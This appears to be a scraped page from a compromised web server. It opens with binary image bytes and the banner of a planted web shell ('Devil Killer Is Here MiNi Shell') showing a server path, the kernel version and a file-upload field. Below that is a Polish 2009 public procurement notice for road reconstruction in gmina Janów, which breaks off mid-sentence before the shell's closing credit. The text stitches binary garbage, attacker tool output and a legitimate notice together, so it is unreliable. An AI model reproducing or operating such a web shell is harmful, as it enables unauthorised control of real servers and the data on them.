JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090310/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090310/57186-N-2009.html

<p class="kh_header"><b>Janów: Przebudowa ciągów komunikacyjnych na terenie gminy Janów</b><br>
<b>Numer ogłoszenia: 57186 - 2009; data zamieszczenia: 10.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Janów , ul. Sokólska 18, 16-130 Janów, woj. podlaskie, tel. 085 7216288, faks 085 7216095.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> janow.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa ciągów komunikacyjnych na terenie gminy Janów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Projekt:  Przebudowa ciągów komunikacyjnych na terenie gminy Janów, któremu został nadany nr KSI (SIMIK 07-13) WND-RPPD.02.01.02-20-040/08

a)	Przebudowa drogi powiatowej nr 1308B Janów-Sitawka-Białousy.
b)	Przebudowa drogi gminnej nr 103903B Sitawka - droga powiatowa nr 1308B.

3.1.	Zadanie  obejmuje:
3.1.1    Przebudowa drogi powiatowej nr 1308 B Janów - Sitawka - Białousy
-	roboty pomiarowe przy robotach ziemnych- trasa dróg w terenie równinnym - 7,503km;
-	karczowanie pni drzew - 152 szt
 -      mechaniczne karczowanie zagajników - 1,39m2                                                                                                                                                     
 -     rozebranie nawierzchni z mas mineralno-bitumicznych gr. 4 cm - 356m2;
-	rozebranie nawierzchni na wjazdach z trylinki gr 15 cm  - 166,00m2;
-	rozebranie krawężników betonowych na podsypce piaskowej - 4885,00m;
-	rozebranie chodników z płyt betonowych 35x35x5 cm na podsypce piaskowej - 1885,00m2;
-	rozebranie obrzeży trawnikowych 6x20 cm na podsypce piaskowej - 860,00m;
-	rozebranie przepustów rurowych na zjazdach o 40 cm - 62,00m;
-	rozebranie przepustów z rur żelbetowych  o 60 cm - 27,00m;
-	rozebranie przepustów sklepionych oraz ścianek czołowych przepustów - 89,00m3;
-	mechaniczne usunięcie warstwy darniny o grubości do 15 cm za pomocą równiarek z      przesunięciem na odległość 30 m w lokalizacji projektowanych poszerzeń  - 9146m2
-	roboty ziemne poprzeczne - 1286,00m3;
-	roboty ziemne z wbudowaniem w nasyp, formowaniem i zagęszczeniem - 1400,00m3;
-	roboty ziemne z dokopu  z formowaniem i zagęszczeniem  - 168,00m3;
-	plantowanie skarp i korony nasypów - 5533,0m2;
-	plantowanie skarp i dna wykopów -10910,0m2;
-	roboty ziemne i transport urobku pod przepusty - 219m3
-	ułożenie przelotowych przepustów drogowych rurowych jednootworowych z rur z polietylenu  o 60 cm - 59,3,00m;
-	ułożenie przelotowych przepustów drogowych rurowych dwuotworowych z rur z polietylenu  o 100 cm - 15,9m;
-	zasypanie wykopów przy przepustach kruszywem naturalnym - 114m3
-	brukowanie skarp i dna rowów przy przepustach - 89,5m2
-	wykonanie ścianek czołowych przepustów o średnicy 60cm - 10,64m3
-	studzienki ściekowe uliczne betonowe o śr. 500m  nad przepustami - szt. 10
-	nawierzchnia żwirowa grubości 20 cm na zjazdach - 3885,0m2;
-	profilowanie poboczy z nadaniem projektowanych spadków - 10154,0m2;
-	mechaniczne zagęszczenie poboczy - 25388,0m2;
-	uzupełnienie poboczy kruszywem naturalnym, gr. warstwy 10 cm - 348,0m3;
-	oczyszczenie rowów z wyprofilowaniem dna i skarp z namułu gr. 20 cm - 3450,00m;
-	oczyszczenie przepustów o 60cm - 20,30m;
-	oczyszczenie przepustów o 3x120cm - 33,00m;
-	regulacja pionowa zasuw wodociągowych - 80 szt.;
-	koryto głębokości 20 cm na poszerzeniach jezdni - 6986m2;
-	dolna warstwa podbudowy gr. 25 cm na poszerzeniach jezdni - 6986m2
-	skropienie emulsją asfaltową nawierzchni drogowych przed ułożeniem warstwy konstrukcyjnej nawierzchni - 47782m2;
-	wyrównanie istniejącej podbudowy mieszanką mineralno - bitumiczną asfaltową - 4164t;
-	wyrównanie istniejącej podbudowy kruszywem naturalnym- 939,00m3;
-	nawierzchnie z mieszanek mineralno - bitumicznych asfaltowych o grubości 4 cm (warstwa ścieralna)- 47782,0m2;
-	Przepusty rurowe pod zjazdami śr.40cm na ławie żwirowej - 314m
-	krawężniki betonowe 20x30 cm na ławie betonowej - 5021,00m;
-	krawężniki kamienne wystające o wymiarach 20x30 cm na obiekcie mostowym w Janowie - 40m  
-	chodniki z płyt betonowych 35x35x5 cm na podsypce piaskowej - 6120,00m2;
-	obrzeża betonowe 20x6 cm na podsypce piaskowej - 4846,00m;
-	koryta wykonywane ręcznie gł. 20cm pod wjazdami - 1470m2
-	warstwa dolna podbudowy z kruszywa naturalnego gr.20cm na wjazdach - 1470m2
-	wjazdy z kostki brukowej betonowej grubości 8 cm - 1470,m2;
-	nawierzchnie żwirowe, warstwa dolna gr 20cm z kruszywa rozściełanego mechanicznie na zjazdach - 1834m2
-	ustawienie znaków drogowych pionowych - 46 szt.

3.1.2.    Przebudowa drogi gminnej nr103903 B Sitawka - droga powiatowa 1308B 
-	roboty pomiarowe - 1,024km;
-	karczowanie pni drzew - 4 szt.
-	mechaniczne karczowanie zagajników - 0,129 ha;
-	rozebranie przepustów rurowych o 60 cm - 17,00m;
-	rozebranie nawierzchni z kamienia brukowca 10 m2
-	roboty ziemne na odkład - 436m3;
-	roboty ziemne z dokopu z wbudowaniem w nasyp - 370 m3;
-	plantowanie skarp i korony nasypów - 977m2;
-	plantowanie skarp i dna wykopów - 766m2;
-	wykopy oraz przekopy pod przepusty - 109,8m3
-	nasypy nad przepustami - 18,89m
-	podbudowa pod przepustami - 27m3
-	ścianki czołowe przepustów - 17,7m3 
-	przepusty prefabrykowane jednootworowe na ławie betonowej śr.60cm - 18m
-	przepusty prefabrykowane jednootworowe na ławie betonowej śr.80cm - 12m
-	profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni - 6235,31n2
-	górna warstwa podbudowy z kruszywa naturalnego gr.25cm - 6258,64m2
-	oczyszczenie i skropienie emulsją asfaltową - 6258,64m2
-	górna warstwa podbudowy poboczy z kruszywa naturalnego gr.10cm - 3247,50m2
-	wykonanie warstwy wiążącej z mieszanek mineralno - asfaltowej gr. 4cm - 6187,49m2
-	nawierzchnia z mieszanki mineralno - asfaltowej gr.4cm (warstwa ścieralna) - 6116,07
-	wykopy pod przepusty pod zjazdami - 69,9m3
-	ławy fundamentowe żwirowe na przepusty pod zjazdami - 56,0m2
-	przepusty z rur betonowych o 40cm pod zjazdami - 56m;
-	górna warstwa podbudowy na zjazdach gr 15cm - 437m2
-	górna warstwa podbudowy na zjeździe na drogę boczną gr. 25cm - 40,10m2
-	ustawienie znaków drogowych pionowych szt.8
-	ustawienie krawężników betonowych wym.15x30cm wraz z wykonaniem ławy z oporem z betonuB10 - 1200m.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.12.00-0, 45.20.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do przetargu jest zobowiązany wnieść wadium w wysokości:
	 -  100 000,00 PLN (słownie PLN: sto tysięcy),
	Wykonawcy, którzy nie wniosą wadium, w tym również na przedłużony okres związania ofertą lub nie zgodzą się na przedłużenie okresu związania ofertą zostaną wykluczeni z postępowania (Art. 24 ust. 2 pkt. 4) Ustawy).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1     Warunki udziału w postępowaniu
1.1.      O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w Art. 22 ust. 1 i nie podlegają wykluczeniu z postępowania na podstawie Art. 24 ust. 1 i 2 Ustawy.
1.2.     W celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonywania działalności lub czynności w zakresie odpowiadającym przedmiotowi zamówienia, w ofercie powinien wykazać (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, spełnienie poniższych warunków Wykonawcy wykazują łącznie):
a)	Zakres działalności powinien zapewnić należyte wykonanie zadania.
b)	Dysponować pracownikami nadzoru posiadającymi uprawnienia niezbędne do wykonywania przedmiotu zamówienia, wymagane przepisami ustawy z dnia 7 lipca 1994 Prawo budowlane oraz należącymi do właściwej Okręgowej Izby Inżynierów Budownictwa
1.3.   W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym, a także dysponuje osobami zdolnymi do wykonania niniejszego zamówienia, Wykonawca musi spełniać następujące warunki (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny i kadrowy oraz łączne kwalifikacje i doświadczenie):
a)	Dysponować ilością zatrudnionych zapewniającą należyte wykonanie zadania. 
b)	Dysponować następującymi narzędziami i urządzeniami: 
- układarki do układania mieszanek mineralno - asfaltowych typu zagęszczonego,
- walce lekkie, średnie, ciężkie,
- walce ogumione,
c)	Wskaże do (wykonania, uczestniczenia w wykonaniu) niniejszego zamówienia następujące (osoby, podmioty), właściwe do realizacji określonych czynności, które posiadają określone kwalifikacje,  niezbędne do wykonania zamówienia:
- kierownik budowy z nie mniej niż trzyletnim doświadczeniem na tym stanowisku (pkt. 8.2.b), z uprawnieniami budowlanymi do kierowania robotami budowlanymi bez ograniczeń w specjalności drogowej, 
- obsługę geodezyjną - geodeta z uprawnieniami zgodnie z ustawą z dnia 17 maja 1989 Dz. U. 2005 Nr 240 poz. 2027
d)	Wskaże, że w okresie ostatnich pięciu lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie zrealizował (zakończył) jako Wykonawca lub Podwykonawca, co najmniej 1 zadanie lub kilka zadań łącznie w okresie roku kalendarzowego, polegające na odbudowie lub przebudowie drogi o wartości nie mniejszej niż:
             -  3 000 000,00 PLN (słownie: trzy miliony  PLN.)
1.4.     W celu potwierdzenia znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia Wykonawca musi spełniać następujące warunki (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniana będzie ich łączna sytuacja ekonomiczna i finansowa)
- wykonawca osiągnął w pracach budowlanych  w ciągu ostatnich 3 lat roczny obrót równy, co najmniej kwocie:
             -  3 000 000,00 PLN (słownie: trzy miliony  PLN.)
- posiadać środki finansowe i, lub zdolność kredytowa, z uwzględnieniem potrącenia na inne zobowiązania umowne w wysokości, co najmniej: 
 -  900 000,00 PLN (słownie: dziewięćset tysięcy PLN.)
- posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Oświadczenia lub dokumenty, jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu.
1.1.	Wykonawca winien złożyć oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w Art. 22 ust. 1 Ustawy wg załączonego do IDW wzoru - Załącznik nr 2;.
	W przypadku składania oferty przez Wykonawców występujących wspólnie, oświadczenie musi być złożone przez każdego Wykonawcę.
1.2.	W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie Art. 24 ust. 1 i 2 Ustawy, Wykonawca musi załączyć do oferty wymagane niżej dokumenty (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich):
1.2.1.	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, który potwierdza prawo Wykonawcy do występowania w obrocie prawnym oraz wskazuje osobę/osoby upoważnione do reprezentacji Wykonawcy. 
W przypadku, gdy nie wszystkie powyższe informacje znajdują się w dokumencie rejestrowym należy również załączyć inne dokumenty prezentujące powyższe dane np. statut, umowę spółki itp. Jeżeli uprawnienie do reprezentacji osoby podpisującej ofertę nie wynika z załączonych dokumentów, do oferty należy dołączyć także pełnomocnictwo w formie oryginału lub kopię poświadczoną przez notariusza
1.2.2.	aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
1.2.3.	aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
9.2.4.	aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.	
1.3.	W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, Wykonawca musi załączyć do oferty wymagane niżej dokumenty (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców niżej wymienione dokumenty mogą być złożone wspólnie): 
1.3.1.	wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, (Załącznik nr 5 i 6);
1.3.2.	pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt. 1.3.1, wykonawca wskazał osoby, którymi będzie dysponował.
1.3.3.	wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje lub będzie dysponował wykonawca, Załącznik nr 4 do  IDW;
1.3.4.	pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeżeli w wykazie, o którym mowa w pkt 1.3.3, wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował;
1.3.5.	dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie, posiadają wymagane uprawnienia;
1.3.6.	wykaz wykonanych w okresie ostatnich pięciu lat robót budowlanych, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości, daty i miejsca wykonania oraz załączenia dokumentów potwierdzających, że roboty te zostały wykonane należycie (Załącznik nr 3).
1.3.7.	W przypadku wykazania kontraktów zawartych w walucie innej niż PLN, wartość kontraktu należy przeliczyć na PLN po kursie średnim NBP obowiązującym w dniu podpisania kontraktu (w takim przypadku prosimy o podanie daty podpisania kontraktu).
1.4.	W celu potwierdzenia, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, Wykonawca musi załączyć do oferty wymagane niżej dokumenty (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich):
1.4.1.		sprawozdanie finansowe albo jego części, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego innych dokumentów określających obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie trzy lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres (Załącznik nr 7).
1.4.2.		informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
1.4.3.		polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności
1.5.	Wymagane w punktach 1.1 do 1.4 dokumenty należy przedstawić w formie oryginałów lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę. 
1.6.	Dodatkowo do oferty należy załączyć:
a)	dowód wniesienia wadium jako potwierdzenie, że Wykonawca przystępujący do przetargu wywiązał się z obowiązku wniesienia wadium;
b)	parafowany formularz umowy - dokument ten powinien zostać parafowany przez osobę upoważnioną do występowania w imieniu Wykonawcy bądź też, w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, przez ustanowionego pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia;
c)	parafowany formularz karty gwarancyjnej - dokument ten powinien zostać parafowany przez osobę upoważnioną do występowania w imieniu Wykonawcy bądź też, w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, przez ustanowionego pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia (Załącznik nr 8);
d)	kosztorysy ofertowe;
e)	Harmonogram rzeczowo - finansowy realizacji zadania, który powinien obejmować wykonanie wszystkich robót określonych SIWZ dla poszczególnych zadań przy uwzględnieniu wszystkich osób i podmiotów zaangażowanych w realizację zadania w czasie określonym przez Zamawiającego, tj. Wykonawca musi zadeklarować wykonanie robót i przedstawienie ich do odbioru nie później niż okres przewidziany na wykonanie robót zgodnie z zapisami SIWZ od dnia podpisania umowy z Zamawiającym oraz przewidywane płatności (uwzględniając warunki kontraktu - przepływy finansowe w układzie kwartalnym dla całego czasu trwania umowy) Załącznik nr 9; 
W przypadku dwóch lub więcej wykonawców wspólnie ubiegających się o realizację zamówienia wykonawcy przygotowują wspólny harmonogram
f)	pełnomocnictwo do reprezentowania Wykonawców wspólnie ubiegających się o zamówienie zgodnie z zapisem punktu 10  IDW.
2.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia oraz wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej
2.1.1.	Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia powinni spełniać warunki udziału w postępowaniu określone w punkcie 8 niniejszej IDW oraz złożyć dokumenty potwierdzające spełnianie tych warunków zgodnie z zapisami zawartymi w punkcie 9 IDW.
	Ponadto ww. Wykonawcy ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 
	Preferowane jest, aby Pełnomocnikiem był jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.	
2.1.2.	Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem. 
2.1.3.	W przypadku wyboru oferty wykonawców wspólnie ubiegających się o udzielenie zamówienia, przed zawarciem umowy w sprawie zamówienia publicznego, przedstawiają oni umowę regulującą ich współpracę.
2.2	Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej:
2.2.1. 	Zamiast dokumentu, o którym mowa w pkt. 1.2.1.; 1.2.2.; 1.2.4. składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b)	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
c)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
2.2.2.	Zamiast dokumentu, o którym mowa w pkt. 1.2.3. składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt. 4-8 Ustawy.
2.2.3.	Dokumenty, o których mowa w pkt. 2.2.1., litera a i c oraz pkt. 2.2.2., powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert. Dokument, o którym mowa w ust. 2.2.1. litera b, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert
2.2.4.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów wskazanych w niniejszym pkt. 2.2.1.  i 2.2.2. zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawionych nie wcześniej niż w terminach określonych w pkt. 2.2.3.
2.2.5.	Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> janow.com.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Janowie
ul Sokólska 18
16 - 130 Janów.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.04.2009 godzina 11:00, miejsce: Urząd Gminy w Janowie
ul Sokólska 18
16 - 130 Janów
pokój nr 3.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie współfinansowane z Europejskiego Funduszu Rozwoju Regionalnego
w ramach

Creat By MiNi SheLL
